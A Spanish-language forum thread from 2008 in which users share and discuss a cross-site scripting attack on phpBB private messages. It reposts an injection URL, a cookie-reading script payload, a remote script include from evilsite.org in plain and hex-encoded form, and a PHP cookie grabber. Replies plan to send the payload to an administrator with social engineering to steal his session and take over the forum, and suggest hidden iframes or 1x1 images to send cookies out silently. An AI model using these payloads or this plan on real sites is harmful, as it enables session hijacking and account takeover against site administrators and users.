Hola, e encontrado este xss
CODE
Use: http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss
]&p=6779
Where [xss] need to be changed and replaced with several javascript and/or vBscript, etc (It's all up to your imaginations) - I'm not going to gave out any step-by-step tutorial for doing this, do your own experiment(s):
CODE
";!–"<script>alert(document.cookie);</script>=&{(alert(1))}
In order to do any redirection, you can go and use these script(s):
CODE
ASCII - <script src=http://www.evilsite.org/WaRWolFz/file.js>
Hex - %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%
70%3a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f%72%67%2f%66
%69%6c%65%2e%6a%73%3e
And in order to put the cookies grabber, you can use this php script:
CODE
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['warwolfz'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."nIP:".$ip."nReferer:".$referer."nUser-Agent:".$agent."nCookie:".$data."nn";
$file = fopen('cookies.html' , 'a');
fwrite($file,$text);
fclose($file);
?>
segun dicen, es en los mps pero no entiendo su funcionamiento
alguien me podria explicar de que trata?
Pues viejo a lo que hace referencia es al deface en un foro, y lo de los mensajes privados o MPS es para vos insertar el script y robar la cookie de usario administrador y Ownear el foro obviamente el mensaje debe ser dirigido al moderador o admin con un poquito de ingenieria social, no he visto bien el bug pero conozco de estos ataques Xss. :D
Se dice que es vulnerable a XSS
:http://es.wikipedia.org/wiki/XSS
Donde se puede injectar diferentes codigos ya sean javascript o vBscript y que ademas no te dara explicaciones de como funciona XDD.
Se puede injectar un codigo ejemplo como este:
";!–"<script>alert(document.cookie);</script>=&{(alert(1))}
O puedes aplicar un "redirect" con un .js mailicioso (propio) con estas caracteristicas.
ASCII - <script src=http://www.evilsite.org/WaRWolFz/file.js>
Hex - %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%
70%3a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f%72%67%2f%66
%69%6c%65%2e%6a%73%3e
Donde tambien pudes usar un cookie grabber, basandote en este template:
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['warwolfz'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."nIP:".$ip."nReferer:".$referer."nUser-Agent:".$agent."nCookie:".$data."nn";
$file = fopen('cookies.html' , 'a');
fwrite($file,$text);
fclose($file);
?>
Cita de: kernel19 en 27 Noviembre 2008, 06:01 AM
con un poquito de ingenieria social, no he visto bien el bug pero conozco de estos ataques Xss. :D
en lo de ingenieria social no te preocupes, lo se hacer y de gran manera
lo que no entiendo es
http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss
]&p=6779
se supone que se le envia a la persona?
les e enviado un mensaje, si tengo que leerme un tutorial para poder enviar esto lo hago obviamente si es objetivo y me sirve
se puede activar un link que tome cookies sin crear una redireccion?
solo que se guarde y siga en la pagina actual
Saludos
lo recomendable es que vallas y busques informacion sobre XSS antes de volver a preguntar cualquier otra cosa XD
aqui en el foro hay muchos y muy bien explicados
Cita de: Azielito en 27 Noviembre 2008, 18:15 PM
lo recomendable es que vallas y busques informacion sobre XSS antes de volver a preguntar cualquier otra cosa
aqui en el foro hay muchos y muy bien explicados
es justamente lo que estoy haciendo aqui
vere lo que tienen sobre xss pero.. que posibilidades hay?
se pueden copiar las cookies sin una redireccion a una web?
lo puedo hacer como aplicacion pero.. lo de enviar de una web a otra pagina seria evidente
puedes enviar los datos de la cookie y guardarla con ajax creo recodarecordar, corrijanme si me equivoco...
En caso de que no se pueda con ajax puedes hacer un iframe pequeño mediante javascript y enviar ahí los datos =D
podes poner un <img> apuntando a tu php como si fuera un frame (el navegador va a hacer la peticion igual) y de 1x1
Cita de: s E t H en 28 Noviembre 2008, 18:04 PM
podes poner un <img> apuntando a tu php como si fuera un frame (el navegador va a hacer la peticion igual) y de 1x1
tenes toda la razon, es muy util saber esto
e aprendido una o 2 cosas despues de ver los manuales tambien
ahora una duda, e visto que en el asunto de las cookies se puede hacer que se active el php automaticamente.. pero al funcionar esto envia a otra pagina? o sigue en la misma pero ya capto la informacion en el ftp propio
otra aun mas importante
mi duda es, la pagina tiene que ser vulnerable (que ejecute xss) para que funcione el htaccess sumado con la aplicacion php?
o el hecho de que la imagen funcione como aplicacion hace que la aplicacion sirva de todas maneras, independientemente de si la pagina es o no vulnerable al xss
Saludos